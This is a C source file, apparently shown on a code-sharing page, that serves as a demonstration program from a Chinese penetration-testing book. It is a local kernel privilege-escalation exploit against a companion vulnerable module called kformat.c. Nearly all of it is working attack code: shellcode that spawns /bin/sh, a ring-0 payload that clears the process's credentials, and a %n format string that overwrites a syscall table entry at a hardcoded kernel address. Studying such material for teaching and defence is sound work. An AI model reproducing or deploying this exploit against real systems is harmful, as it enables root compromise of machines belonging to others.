📄 kformat_exploit.c
字号:
/* kformat_exploit.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* 针对kformat.c的利用程序
* gcc -o kformat_exploit kformat_exploit.c
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <linux/sysctl.h>
#define __NR_new_function 240
static inline _syscall2(int, new_function, unsigned int ,len,char * ,code);
#define __NR_exploit 241
static inline _syscall2(int, exploit, unsigned int ,len,char * ,code);
#define NOP 'A'
#define RETLOC 0xc02c209c+__NR_exploit * 4
char shell[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char shellcode[]={
0xba,0xff,0xff,0xff,0xff,//mov $0xffffffff,%edx
0xb8,0x2b,0x00,0x00,0x00,//mov $0x2b,%eax
0x50,//push %eax
0x50,
0x1f,//pop %ds
0x07,//pop %es
0x89,0xe0,//mov %esp,%eax
//next
0x83,0xc0,0x04,//add $0x4,%eax
0x8b,0x18,//mov (%eax),%ebx
0x83,0xfb,0x23,//cmp $0x23,%ebx
0x75,0xf6,//jne next
0x83,0xe8,0x04,//sub %0x04,%eax
0x89,0xc4,//mov %eax,%esp
0x89,0x10,//mov %edx,(%eax)
0xb8,0x00,0xe0,0xff,0xff, /*mov $0xffffe000,%eax*/
0x21,0xe0,
0xc7,0x80,0x28,0x01,0x00,0x00,0x00,0x00,0x00,0x00,/*movl $0x0,0x128(%eax) */
//0x5b,//pop %ebx
//0x58,//pop %eax
0xcf /* iret */
};
char formatstrings[256]={
"retloc|%len|%n"
};
int main(int argc,char **argv)
{
char code[1024];
unsigned int len;
*(int *)(shellcode+1)=(int) shell;
memset(code,NOP,1024);
len = 256;
printf("shellcode addr is:%p\nshell addr is %p\n",shellcode,shell);
sprintf(formatstrings,"%c%c%c%c%%%dp%%n",RETLOC&0x000000ff,(RETLOC&0x0000ff00)>>8,(RETLOC&0x00ff0000)>>16, (RETLOC&0xff000000)>>24,(int )shellcode -4);
printf("%s",formatstrings);
fflush(stdout);
memcpy(code,formatstrings,sizeof(formatstrings));
new_function(len,code);
exploit(len,code);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -